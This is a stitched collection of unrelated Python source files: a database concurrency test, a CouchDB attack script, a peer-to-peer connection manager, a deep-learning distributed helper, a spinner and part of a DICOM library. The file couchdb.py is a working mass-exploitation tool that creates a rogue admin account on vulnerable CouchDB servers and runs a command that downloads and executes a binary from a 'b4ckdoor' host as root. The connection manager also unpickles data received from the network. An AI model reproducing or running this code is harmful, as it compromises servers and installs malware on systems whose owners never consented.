# test source of changes for other workers.
failed = threading.Event()
failure = [None] * nwork # [tx] is failure from T(tx)
def T(tx, N):
db = dbopen()
def t_():
transaction.begin()
zconn = db.open()
root = zconn.root()
obj1 = root['obj1']
obj2 = root['obj2']
# obj1 - reload it from zstor
# obj2 - get it from zconn cache
obj1._p_invalidate()
# both objects must have the same values
i1 = obj1.value
i2 = obj2.value
if i1 != i2:
#print('FAIL')
failure[tx] = "T%s: obj1.value (%d) != obj2.value (%d)" % (tx, i1, i2)
failed.set()
# change objects once in a while
if randint(0,4) == 0:
#print("T%s: modify" % tx)
obj1.value += 1
obj2.value += 1
try:
transaction.commit()
except POSException.ConflictError:
#print('conflict -> ignore')
transaction.abort()
zconn.close()
try:
for i in range(N):
#print('T%s.%d' % (tx, i))
t_()
if failed.is_set():
break
except:
failed.set()
raise
finally:
db.close()
# run the workers concurrently.
init()
N = 100
tg = []
for x in range(nwork):
t = threading.Thread(name='T%d' % x, target=T, args=(x, N))
t.start()
tg.append(t)
for t in tg:
t.join(60)
if failed.is_set():
self.fail([_ for _ in failure if _])
|
couchdb.py
|
#!/usr/bin/env python
from requests.auth import HTTPBasicAuth
import random
import requests
import re
import sys
from threading import Thread
from time import sleep
ips = open(sys.argv[1], "r").readlines()
Rdatabases = ["/a564r6fusmg","/dyejdffyjdxryj","/esreghsrgfbgrsb","/sfafdbsrdgjqef","/fyukddyuodyj","/yfjdued6yjdsza","/wefrhnwgerhgsrh","/sfdrebwbef","/fdfgffrgfdsg"]
def getVersion(ip):
version = requests.get(ip).json()["version"]
return version
def exploit(ip):
global Rdatabases
try:
try:
if sys.argv[2] == "-r":
cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root;"
elif sys.argv[2] == "-c":
cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root;"
elif sys.argv[2] == "-w":
cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root;"
elif sys.argv[2] == "-x":
cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root; "
elif not sys.argv[2]:
print "NOT ENOUGH ARGUMENTS!"
sys.exit(0)
except SyntaxError as e:
print "\n Options: (-r|-c|-w|-x)"
db_ = random.choice(Rdatabases)
db = db_
ip = ip.rstrip("\n")
ip = "http://"+ip+":5984"
version = getVersion(ip)
#print("[*] Detected CouchDB Version " + version)
vv = version.replace(".", "")
v = int(version[0])
if v == 1 and int(vv) <= 170:
version = 1
elif v == 2 and int(vv) < 211:
version = 2
else:
#print("[-] Version " + version + " not vulnerable.")
sys.exit()
with requests.session() as session:
#print("[*] Attempting %s Version %d"%(ip,v))
session.headers = {"Content-Type": "application/json"}
try:
payload = '{"type": "user", "name": "'
payload += "guest"
payload += '", "roles": ["_admin"], "roles": [],'
payload += '"password": "guest"}'
pr = session.put(ip + "/_users/org.couchdb.user:guest",
data=payload)
#print("[+] User guest with password guest successfully created.")
except requests.exceptions.HTTPError:
sys.exit()
session.auth = HTTPBasicAuth("guest", "guest")
try:
if version == 1:
session.put(ip + "/_config/query_servers/cmd",
data='"' + cmd + '"')
#print("[+] Created payload at: " + ip + "/_config/query_servers/cmd")
else:
host = session.get(ip + "/_membership").json()["all_nodes"][0]
session.put(ip + "/_node/" + ip + "/_config/query_servers/cmd",
data='"' + cmd + '"')
#print("[+] Created payload at: " + ip + "/_node/" + host + "/_config/query_servers/cmd")
except requests.exceptions.HTTPError as e:
sys.exit()
try:
session.put(ip + db)
session.put(ip + db + "/zero", data='{"_id": "HTP"}')
except requests.exceptions.HTTPError:
sys.exit()
# Execute payload
try:
if version == 1:
session.post(ip + db + "/_temp_view?limit=10",
data='{"language": "cmd", "map": ""}')
else:
session.post(ip + db + "/_design/zero",
data='{"_id": "_design/zero", "views": {"god": {"map": ""} }, "language": "cmd"}')
print("[+] Command executed: " + cmd)
except requests.exceptions.HTTPError:
sys.exit()
#print("[*] Cleaning up.")
# Cleanup database
try:
session.delete(ip + db)
except requests.exceptions.HTTPError:
sys.exit()
# Cleanup payload
try:
if version == 1:
session.delete(ip + "/_config/query_servers/cmd")
else:
host = session.get(ip + "/_membership").json()["all_nodes"][0]
session.delete(ip + "/_node" + host + "/_config/query_servers/cmd")
except requests.exceptions.HTTPError:
sys.exit()
except:
pass
for ip in ips:
try:
hoho = Thread(target=exploit, args=(ip,))
hoho.start()
sleep(0.001)
except:
pass
|
connection_manager_4edge.py
|
import socket
import threading
import pickle
import codecs
from concurrent.futures import ThreadPoolExecutor
from .core_node_list import CoreNodeList
from .message_manager import (
MessageManager,
MSG_CORE_LIST,
MSG_PING,
MSG_ADD_AS_EDGE,
ERR_PROTOCOL_UNMATCH,
ERR_VERSION_UNMATCH,
OK_WITH_PAYLOAD,
OK_WITHOUT_PAYLOAD,
)
# 動作確認用の値。本来は30分(1800)くらいがいいのでは
PING_INTERVAL = 10
class ConnectionManager4Edge(object):
def __init__(self, host, my_port, my_core_host, my_core_port, callback):
print('Initializing ConnectionManager4Edge...')
self.host = host
self.port = my_port
self.my_core_host = my_core_host
self.my_core_port = my_core_port
self.core_node_set = CoreNodeList()
self.mm = MessageManager()
self.callback = callback
def start(self):
"""
最初の待受を開始する際に呼び出される(ClientCore向け
"""
t = threading.Thread(target=self.__wait_for_access)
t.start()
self.ping_timer = threading.Timer(PING_INTERVAL, self.__send_ping)
self.ping_timer.start()
def connect_to_core_node(self):
"""
ユーザが指定した既知のCoreノードへの接続(ClientCore向け
"""
self.__connect_to_P2PNW(self.my_core_host,self.my_core_port)
def get_message_text(self, msg_type, payload = None):
"""
指定したメッセージ種別のプロトコルメッセージを作成して返却する
params:
msg_type : 作成したいメッセージの種別をMessageManagerの規定に従い指定
payload : メッセージにデータを格納したい場合に指定する
return:
msgtxt : MessageManagerのbuild_messageによって生成されたJSON形式のメッセージ
"""
msgtxt = self.mm.build(msg_type, self.port, payload)
print('generated_msg:', msgtxt)
return msgtxt
def send_msg(self, peer, msg):
"""
指定されたノードに対してメッセージを送信する
params:
peer : 接続先のIPアドレスとポート番号を格納するタプル
msg : 送信したいメッセージ(JSON形式を想定)
"""
print('Sending... ', msg)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((peer))
s.sendall(msg.encode('utf-8'))
s.close()
except:
print('Connection failed for peer : ', peer)
self.core_node_set.remove(peer)
print('Tring to connect into P2P network...')
current_core_list = self.core_node_set.get_list()
if len(current_core_list) != 0:
new_core = self.core_node_set.get_c_node_info()
self.my_core_host = new_core[0]
self.my_core_port = new_core[1]
self.connect_to_core_node(self.my_pubkey)
self.send_msg((new_core[0], new_core[1]), msg)
else:
print('No core node found in our list...')
self.ping_timer.cancel()
def connection_close(self):
"""
終了前の処理としてソケットを閉じる
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect( (self.host, self.port))
self.socket.close()
s.close()
self.ping_timer.cancel()
def __connect_to_P2PNW(self, host, port):
"""
指定したCoreノードへ接続要求メッセージを送信する
params:
host : 接続先となるCoreノードのIPアドレス
port : 接続先となるCoreノードのポート番号
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
msg = self.mm.build(MSG_ADD_AS_EDGE, self.port)
print(msg)
s.sendall(msg.encode('utf-8'))
s.close()
def __wait_for_access(self):
"""
Serverソケットを開いて待ち受け状態に移行する
"""
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.host, self.port))
self.socket.listen(0)
executor = ThreadPoolExecutor(max_workers=10)
while True:
print('Waiting for the connection ...')
soc, addr = self.socket.accept()
print('Connected by .. ', addr)
data_sum = ''
params = (soc, addr, data_sum)
executor.submit(self.__handle_message, params)
def __handle_message(self, params):
"""
受信したメッセージを確認して、内容に応じた処理を行う。クラスの外からは利用しない想定
params :
soc : 受信したsocketのコネクション
addr : 送信元のアドレス情報
data_sum : 受信したデータを連結するためのベースにする空文字
"""
soc, addr, data_sum = params
while True:
data = soc.recv(1024)
data_sum = data_sum + data.decode('utf-8')
if not data:
break
if not data_sum:
return
result, reason, cmd, peer_port, payload = self.mm.parse(data_sum)
print(result, reason, cmd, peer_port, payload)
status = (result, reason)
if status == ('error', ERR_PROTOCOL_UNMATCH):
print('Error: Protocol name is not matched')
return
elif status == ('error', ERR_VERSION_UNMATCH):
print('Error: Protocol version is not matched')
return
elif status == ('ok', OK_WITHOUT_PAYLOAD):
if cmd == MSG_PING:
pass
else:
# 接続情報以外のメッセージしかEdgeノードで処理することは想定していない
print('Edge node does not have functions for this message!')
elif status == ('ok', OK_WITH_PAYLOAD):
if cmd == MSG_CORE_LIST:
# Coreノードに依頼してCoreノードのリストを受け取る口だけはある
print('Refresh the core node list...')
new_core_set = pickle.loads(payload.encode('utf8'))
print('latest core node list: ', new_core_set)
self.core_node_set.overwrite(new_core_set)
else:
self.callback((result, reason, cmd, peer_port, payload))
else:
print('Unexpected status', status)
def __send_ping(self):
"""
生存確認メッセージの送信処理実体。中で確認処理は定期的に実行し続けられる
param:
peer : 送信確認メッセージの送り先となるノードの接続情報(IPアドレスとポート番号)
"""
peer = (self.my_core_host, self.my_core_port)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((peer))
msg = self.mm.build(MSG_PING)
s.sendall(msg.encode('utf-8'))
s.close()
except:
print('Connection failed for peer : ', peer)
self.core_node_set.remove(peer)
print('Tring to connect into P2P network...')
current_core_list = self.core_node_set.get_list()
if len(current_core_list) != 0:
new_core = self.core_node_set.get_c_node_info()
self.my_core_host = new_core[0]
self.my_core_port = new_core[1]
self.connect_to_core_node(self.my_pubkey)
else:
print('No core node found in our list...')
self.ping_timer.cancel()
self.ping_timer = threading.Timer(PING_INTERVAL, self.__send_ping)
self.ping_timer.start()
|
helper.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import functools
import multiprocessing as mp
from collections import defaultdict
from typing import Callable
from weakref import WeakSet
import numpy as np
from megengine.autodiff.grad_manager import GradManager, get_backwarding_grad_manager
from megengine.device import get_default_device, get_device_count
from ..core.ops.builtin import ParamPackConcat, ParamPackSplit
from ..core.tensor.core import apply
from ..functional.utils import copy
from ..tensor import Tensor
from ..utils.future import Future
from .functional import all_reduce_sum, broadcast
from .group import WORLD, Group, group_barrier, is_distributed
def param_pack_split(inp: Tensor, offsets: list, shapes: list):
r"""
Returns split tensor to tensor list as offsets and shapes described,
only used for ``parampack``.
:param inp: input tensor.
:param offsets: offsets of outputs, length of `2 * n`,
while n is tensor nums you want to split,
format `[begin0, end0, begin1, end1]`.
:param shapes: tensor shapes of outputs.
:return: splitted tensors.
Examples:
.. testcode::
import numpy as np
from megengine import tensor
from megengine.distributed.helper import param_pack_split
a = tensor(np.ones((10,), np.int32))
b, c = param_pack_split(a, [0, 1, 1, 10], [(1,), (3, 3)])
print(b.numpy())
print(c.numpy())
Outputs:
.. testoutput::
[1]
[[1 1 1]
[1 1 1]
[1 1 1]]
"""
op = ParamPackSplit()
op.offsets = offsets
op.shapes = shapes
return apply(op, inp)
def param_pack_concat(inps: list, offsets: Tensor, offsets_val: list):
r"""
Returns concated tensor, only used for ``parampack``.
:param inps: input tensors.
:param offsets: device value of offsets.
:param offsets_val: offsets of inputs, length of `2 * n`,
format `[begin0, end0, begin1, end1]`.
:return: concated tensor.
Examples:
.. testcode::
import numpy as np
from megengine import tensor
from megengine.distributed.helper import param_pack_concat
a = tensor(np.ones((1,), np.int32))
b = tensor(np.ones((3, 3), np.int32))
offsets_val = [0, 1, 1, 10]
offsets = tensor(offsets_val, np.int32)
c = param_pack_concat([a, b], offsets, offsets_val)
print(c.numpy())
Outputs:
.. testoutput::
[1 1 1 1 1 1 1 1 1 1]
"""
op = ParamPackConcat()
op.offsets = offsets_val
return apply(op, *inps, offsets)[0]
def get_offsets(shapes):
offsets = []
offset = 0
for shape in shapes:
offsets.append(offset)
offset += int(np.prod(shape))
offsets.append(offset)
return offsets
def pack_allreduce_split(pack_list, shapes, group, reduce_method):
offsets_val = get_offsets(shapes)
offsets = Tensor(offsets_val)
packed_grads = param_pack_concat(pack_list, offsets, offsets_val)
packed_grads = all_reduce_sum(packed_grads, group, group.comp_node)
if reduce_method == "mean":
packed_grads /= group.size
grads = param_pack_split(packed_grads, offsets_val, shapes)
return grads
class TensorFuture(Future):
def device(self):
raise "Sorry, this tensor is not ready"
def numpy(self):
raise "Sorry, this tensor is not ready"
def shape(self):
raise "Sorry, this tensor is not ready"
def dtype(self):
raise "Sorry, this tensor is not ready"
def synchronized(func: Callable):
"""Decorator. Decorated function will synchronize when finished.
Specifically, we use this to prevent data race during hub.load"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
if not is_distributed():
return func(*args, **kwargs)
ret = func(*args, **kwargs)
group_barrier()
return ret
return wrapper
def _get_device_count_worker(queue, device_type):
num = get_device_count(device_type)
queue.put(num)
def get_device_count_by_fork(device_type: str):
"""Get device count in fork thread.
See https://stackoverflow.com/questions/22950047/cuda-initialization-error-after-fork
for more information.
"""
q = mp.Queue()
p = mp.Process(target=_get_device_count_worker, args=(q, device_type))
p.start()
p.join()
return q.get()
def bcast_list_(inps: list, group: Group = WORLD):
"""Broadcast tensors between given group.
:param inps: input tensors.
:param group: communication group.
"""
for inp in inps:
inp._reset(broadcast(inp, group))
class AllreduceCallback:
"""Allreduce Callback with tensor fusion optimization.
:param reduce_method: the method to reduce gradiants.
:param group: communication group.
"""
def __init__(self, reduce_method: str, group: Group = WORLD):
reduce_method = reduce_method.lower()
assert reduce_method in ["sum", "mean"], "reduce_method should be sum or mean"
self._reduce_method = reduce_method
self._group = group
self._marked_gm = WeakSet()
self._param_pack_thd = 10 * 1024 * 1024
self._reset()
def _reset(self):
self._params = []
self._gradients_dict = dict()
self._futures_dict = dict()
self._packing_list = defaultdict(list)
self._packing_size = defaultdict(int)
self._grad_origin_device = dict()
def _pack(self, dtype):
grad_list = [self._gradients_dict[p] for p in self._packing_list[dtype]]
shapes = [p.shape for p in self._packing_list[dtype]]
reduced_grads = pack_allreduce_split(
grad_list, shapes, self._group, self._reduce_method
)
for param, grad in zip(self._packing_list[dtype], reduced_grads):
self._gradients_dict[param] = grad
self._packing_list[dtype] = []
self._packing_size[dtype] = 0
def __call__(self, param, grad):
gm = get_backwarding_grad_manager()
assert isinstance(gm, GradManager)
if gm not in self._marked_gm:
gm._register_after_backward_callback(self._flush)
self._marked_gm.add(gm)
self._params.append(param)
self._futures_dict[param] = TensorFuture(ack=False)
self._gradients_dict[param] = grad
self._grad_origin_device[param] = str(grad.device)
dtype_str = str(np.dtype(param.dtype))
dtype_size = np.dtype(param.dtype).itemsize
self._packing_list[dtype_str].append(param)
self._packing_size[dtype_str] += int(np.prod(param.shape)) * dtype_size
if self._packing_size[dtype_str] > self._param_pack_thd:
self._pack(dtype_str)
return self._futures_dict[param]
def _flush(self):
for dtype in sorted(self._packing_list.keys()):
self._pack(dtype)
for param in self._params:
grad = self._gradients_dict[param]
grad = copy(grad, self._grad_origin_device[param])
self._futures_dict[param].set(grad)
self._reset()
make_allreduce_cb = AllreduceCallback
|
spinny.py
|
# pylint: skip-file
import itertools, time, threading, sys
class Spinner:
def __init__(self, dt='Loading...', at='Done.'): self.spinner,self.dt,self.at,self.busy = itertools.cycle('⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏'),dt,at,True
def spin(self):
while self.busy: [print(f'{next(self.spinner)} {self.dt}', end='\r', flush=True), time.sleep(0.1)]
def __enter__(self): self.busy, _ = True, threading.Thread(target=self.spin).start()
def __exit__(self, v1, v2, v3):
self.busy, _, _ = False, time.sleep(0.1), print(' ' * (len(self.dt) + 2), end='\r')
return [True, print('❌ Failed: ' + repr(v2)), sys.exit(1)][0] if v1 is not None else print('\r\033[0;32m✓\033[0m ' + self.at)
|
ae.py
|
"""
The main user class, represents a DICOM Application Entity
"""
from copy import deepcopy
from datetime import datetime
import logging
from ssl import SSLContext
import threading
from typing import (
Union,
Optional,
List,
Tuple,
Dict,
cast,
TypeVar,
Type,
Any,
Sequence,
)
import warnings
from pydicom.uid import UID
from pynetdicom import _config
from pynetdicom.association import Association
from pynetdicom.events import EventHandlerType
from pynetdicom.presentation import PresentationContext
from pynetdicom.pdu_primitives import _UI
from pynetdicom.transport import (
AssociationSocket,
AssociationServer,
ThreadedAssociationServer,
)
from pynetdicom.utils import make_target, set_ae, decode_bytes, set_uid
from pynetdicom._globals import (
MODE_REQUESTOR,
DEFAULT_MAX_LENGTH,
DEFAULT_TRANSFER_SYNTAXES,
BIND_ADDRESS,
)
LOGGER = logging.getLogger("pynetdicom.ae")
_T = TypeVar("_T")
ListCXType = List[PresentationContext]
TSyntaxType = Optional[Union[str, UID, Sequence[Union[str, UID]]]]
class ApplicationEntity:
"""Represents a DICOM Application Entity (AE).
An AE may be a *Service Class Provider* (SCP), a *Service Class User* (SCU)
or both.
"""
# pylint: disable=too-many-instance-attributes,too-many-public-methods
def __init__(self, ae_title: str = "PYNETDICOM") -> None:
"""Create a new Application Entity.
.. versionchanged:: 2.0
`ae_title` should be :class:`str`
Parameters
----------
ae_title : str, optional
The AE title of the Application Entity as an ASCII string
(default: ``'PYNETDICOM'``).
"""
self._ae_title: str
self.ae_title = ae_title
from pynetdicom import (
PYNETDICOM_IMPLEMENTATION_UID,
PYNETDICOM_IMPLEMENTATION_VERSION,
)
# Default Implementation Class UID and Version Name
self._implementation_uid: UID = PYNETDICOM_IMPLEMENTATION_UID
self._implementation_version: Optional[str] = PYNETDICOM_IMPLEMENTATION_VERSION
# List of PresentationContext
self._requested_contexts: ListCXType = []
# {abstract_syntax : PresentationContext}
self._supported_contexts: Dict[UID, PresentationContext] = {}
# Default maximum simultaneous associations
self._maximum_associations = 10
# Default maximum PDU receive size (in bytes)
self._maximum_pdu_size = DEFAULT_MAX_LENGTH
# Default timeouts - None means no timeout
self._acse_timeout: Optional[float] = 30
self._connection_timeout: Optional[float] = None
self._dimse_timeout: Optional[float] = 30
self._network_timeout: Optional[float] = 60
# Require Calling/Called AE titles to match if value is non-empty str
self._require_calling_aet: List[str] = []
self._require_called_aet = False
self._servers: List[ThreadedAssociationServer] = []
self._lock: threading.Lock = threading.Lock()
@property
def acse_timeout(self) -> Optional[float]:
"""Get or set the ACSE timeout value (in seconds).
Parameters
----------
value : Union[int, float, None]
The maximum amount of time (in seconds) to wait for association
related messages. A value of ``None`` means no timeout. (default:
``30``)
"""
return self._acse_timeout
@acse_timeout.setter
def acse_timeout(self, value: Optional[float]) -> None:
"""Set the ACSE timeout (in seconds)."""
if value is None:
self._acse_timeout = None
elif isinstance(value, (int, float)) and value >= 0:
self._acse_timeout = value
else:
LOGGER.warning("ACSE timeout set to 30 seconds")
self._acse_timeout = 30
for assoc in self.active_associations:
assoc.acse_timeout = self.acse_timeout
@property
def active_associations(self) -> List[Association]:
"""Return a list of the AE's active
:class:`~pynetdicom.association.Association` threads.
Returns
-------
list of Association
A list of all active association threads, both requestors and
acceptors.
"""
threads = threading.enumerate()
t_assocs = [tt for tt in threads if isinstance(tt, Association)]
return [tt for tt in t_assocs if tt.ae == self]
def add_requested_context(
self,
abstract_syntax: Union[str, UID],
transfer_syntax: TSyntaxType = None,
) -> None:
"""Add a :ref:`presentation context<user_presentation>` to be
proposed when requesting an association.
When an SCU sends an association request to a peer it includes a list
of presentation contexts it would like the peer to support. This
method adds a single
:class:`~pynetdicom.presentation.PresentationContext` to the list of
the SCU's requested contexts.
Only 128 presentation contexts can be included in the association
request. Multiple presentation contexts may be requested with the
same abstract syntax.
To remove a requested context or one or more of its transfer syntaxes
see the :meth:`remove_requested_context` method.
Parameters
----------
abstract_syntax : str or pydicom.uid.UID
The abstract syntax of the presentation context to request.
transfer_syntax : str/pydicom.uid.UID or list of str/pydicom.uid.UID
The transfer syntax(es) to request (default:
:attr:`~pynetdicom._globals.DEFAULT_TRANSFER_SYNTAXES`).
Raises
------
ValueError
If 128 requested presentation contexts have already been added.
Examples
--------
Add a requested presentation context for *Verification SOP Class* with
the default transfer syntaxes by using its UID value.
>>> from pynetdicom import AE
>>> ae = AE()
>>> ae.add_requested_context('1.2.840.10008.1.1')
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Little Endian
=Explicit VR Big Endian
Add a requested presentation context for *Verification SOP Class* with
the default transfer syntaxes by using the inbuilt
:class:`~pynetdicom.sop_class.Verification` object.
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_requested_context(Verification)
Add a requested presentation context for *Verification SOP Class* with
a transfer syntax of *Implicit VR Little Endian*.
>>> from pydicom.uid import ImplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_requested_context(Verification, ImplicitVRLittleEndian)
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
Add two requested presentation contexts for *Verification SOP Class*
using different transfer syntaxes for each.
>>> from pydicom.uid import (
... ImplicitVRLittleEndian, ExplicitVRLittleEndian, ExplicitVRBigEndian
... )
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_requested_context(
... Verification, [ImplicitVRLittleEndian, ExplicitVRBigEndian]
... )
>>> ae.add_requested_context(Verification, ExplicitVRLittleEndian)
>>> len(ae.requested_contexts)
2
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Big Endian
>>> print(ae.requested_contexts[1])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Explicit VR Little Endian
References
----------
* DICOM Standard, Part 8,
:dcm:`Section 7.1.1.13<part08.html#sect_7.1.1.13>`
* DICOM Standard, Part 8,
:dcm:`Table 9-18<part08.html#table_9-18>`
"""
if transfer_syntax is None:
transfer_syntax = DEFAULT_TRANSFER_SYNTAXES
if len(self.requested_contexts) >= 128:
raise ValueError(
"Failed to add the requested presentation context as there "
"are already the maximum allowed number of requested contexts"
)
# Allow single transfer syntax values for convenience
if isinstance(transfer_syntax, str):
transfer_syntax = [transfer_syntax]
context = PresentationContext()
context.abstract_syntax = UID(abstract_syntax)
context.transfer_syntax = [UID(syntax) for syntax in transfer_syntax]
self._requested_contexts.append(context)
def add_supported_context(
self,
abstract_syntax: Union[str, UID],
transfer_syntax: TSyntaxType = None,
scu_role: Optional[bool] = None,
scp_role: Optional[bool] = None,
) -> None:
"""Add a :ref:`presentation context<user_presentation>` to be
supported when accepting association requests.
When an association request is received from a peer it supplies a list
of presentation contexts that it would like the SCP to support. This
method adds a :class:`~pynetdicom.presentation.PresentationContext`
to the list of the SCP's supported contexts.
Where the abstract syntax is already supported the transfer syntaxes
will be extended by those supplied in `transfer_syntax`. To remove
a supported context or one or more of its transfer syntaxes see the
:meth:`remove_supported_context` method.
Parameters
----------
abstract_syntax : str, pydicom.uid.UID
The abstract syntax of the presentation context to be supported.
transfer_syntax : str/pydicom.uid.UID or list of str/pydicom.uid.UID
The transfer syntax(es) to support (default:
:attr:`~pynetdicom._globals.DEFAULT_TRANSFER_SYNTAXES`).
scu_role : bool or None, optional
If the association requestor includes an
:ref:`SCP/SCU Role Selection Negotiation<user_presentation_role>`
item for this context then:
* If ``None`` then ignore the proposal (if either `scp_role` or
`scu_role` is ``None`` then both are assumed to be) and use the
default roles.
* If ``True`` accept the proposed SCU role
* If ``False`` reject the proposed SCU role
scp_role : bool or None, optional
If the association requestor includes an
:ref:`SCP/SCU Role Selection Negotiation<user_presentation_role>`
item for this context then:
* If ``None`` then ignore the proposal (if either `scp_role` or
`scu_role` is ``None`` then both are assumed to be) and use the
default roles.
* If ``True`` accept the proposed SCP role
* If ``False`` reject the proposed SCP role
Examples
--------
Add support for presentation contexts with an abstract syntax of
*Verification SOP Class* and the default transfer syntaxes by using
its UID value.
>>> from pynetdicom import AE
>>> ae = AE()
>>> ae.add_supported_context('1.2.840.10008.1.1')
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Little Endian
=Explicit VR Big Endian
Add support for presentation contexts with an abstract syntax of
*Verification SOP Class* and the default transfer syntaxes by using the
inbuilt :class:`~pynetdicom.sop_class.Verification` object.
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_supported_context(Verification)
Add support for presentation contexts with an abstract syntax of
*Verification SOP Class* and a transfer syntax of *Implicit VR Little
Endian*.
>>> from pydicom.uid import ImplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_supported_context(Verification, ImplicitVRLittleEndian)
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
Add support for presentation contexts with an abstract syntax of
*Verification SOP Class* and transfer syntaxes of *Implicit VR Little
Endian* and *Explicit VR Big Endian* and then update the context to
also support *Explicit VR Little Endian*.
>>> from pydicom.uid import (
... ImplicitVRLittleEndian, ExplicitVRLittleEndian, ExplicitVRBigEndian
... )
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_supported_context(
... Verification, [ImplicitVRLittleEndian, ExplicitVRBigEndian]
... )
>>> ae.add_supported_context(Verification, ExplicitVRLittleEndian)
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Big Endian
=Explicit VR Little Endian
Add support for *CT Image Storage* and if the association requestor
includes an SCP/SCU Role Selection Negotiation item for *CT Image
Storage* requesting the SCU and SCP roles then accept the proposal.
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import CTImageStorage
>>> ae = AE()
>>> ae.add_supported_context(CTImageStorage, scu_role=True, scp_role=True)
"""
if transfer_syntax is None:
transfer_syntax = DEFAULT_TRANSFER_SYNTAXES # List[str]
abstract_syntax = UID(abstract_syntax)
if not isinstance(scu_role, (type(None), bool)):
raise TypeError("`scu_role` must be None or bool")
if not isinstance(scp_role, (type(None), bool)):
raise TypeError("`scp_role` must be None or bool")
# For convenience allow single transfer syntax values
if isinstance(transfer_syntax, str):
transfer_syntax = [transfer_syntax]
transfer_syntax = [UID(ts) for ts in transfer_syntax]
# If the abstract syntax is already supported then update the transfer
# syntaxes
if abstract_syntax in self._supported_contexts:
context = self._supported_contexts[abstract_syntax]
for syntax in transfer_syntax:
context.add_transfer_syntax(syntax)
context.scu_role = None or scu_role
context.scp_role = None or scp_role
else:
context = PresentationContext()
context.abstract_syntax = abstract_syntax
context.transfer_syntax = transfer_syntax # type: ignore
context.scu_role = None or scu_role
context.scp_role = None or scp_role
self._supported_contexts[abstract_syntax] = context
@property
def ae_title(self) -> str:
"""Get or set the AE title as :class:`str`.
.. versionchanged:: 2.0
`ae_title` should be set using :class:`str` and returns
:class:`str` rather than :class:`bytes`
Parameters
----------
value : str
The AE title to use for the local Application Entity as an ASCII
string.
Returns
-------
str
The local Application Entity's AE title.
"""
return self._ae_title
@ae_title.setter
def ae_title(self, value: str) -> None:
"""Set the AE title using :class:`str`."""
if isinstance(value, bytes):
warnings.warn(
"The use of bytes with 'ae_title' is deprecated, use an ASCII "
"str instead",
DeprecationWarning,
)
value = decode_bytes(value)
self._ae_title = cast(str, set_ae(value, "ae_title", False, False))
def associate(
self,
addr: str,
port: int,
contexts: Optional[ListCXType] = None,
ae_title: str = "ANY-SCP",
max_pdu: int = DEFAULT_MAX_LENGTH,
ext_neg: Optional[List[_UI]] = None,
bind_address: Tuple[str, int] = BIND_ADDRESS,
tls_args: Optional[Tuple[SSLContext, str]] = None,
evt_handlers: Optional[List[EventHandlerType]] = None,
) -> Association:
"""Request an association with a remote AE.
An :class:`~pynetdicom.association.Association` thread is returned
whether or not the association is accepted and should be checked using
:attr:`Association.is_established
<pynetdicom.association.Association.is_established>`
before sending any messages. The returned thread will only be running
if the association was established.
.. versionchanged:: 1.2
Added `bind_address` and `tls_arg` keyword parameters
.. versionchanged:: 1.3
Added `evt_handlers` keyword parameter
.. versionchanged:: 1.5
`evt_handlers` now takes a list of 2- or 3-tuples
.. versionchanged:: 2.0
* `ae_title` should now be :class:`str`
* The default `bind_address` was changed to ``("127.0.0.1", 0)``
Parameters
----------
addr : str
The peer AE's TCP/IP address.
port : int
The peer AE's listen port number.
contexts : list of presentation.PresentationContext, optional
The presentation contexts that will be requested by the AE for
support by the peer. If not used then the presentation contexts in
the :attr:`requested_contexts` property will be requested instead.
ae_title : str, optional
The peer's AE title, will be used as the *Called AE Title*
parameter value (default ``'ANY-SCP'``).
max_pdu : int, optional
The :dcm:`maximum PDV receive size<part08/chapter_D.html#sect_D.1>`
in bytes to use when negotiating the association (default
``16832``). A value of ``0`` means the PDV size is unlimited.
ext_neg : list of UserInformation objects, optional
A list containing optional extended negotiation items:
.. currentmodule:: pynetdicom.pdu_primitives
* :class:`AsynchronousOperationsWindowNegotiation` (0 or 1 item)
* :class:`~SCP_SCU_RoleSelectionNegotiation` (0 to N items)
* :class:`~SOPClassCommonExtendedNegotiation` (0 to N items)
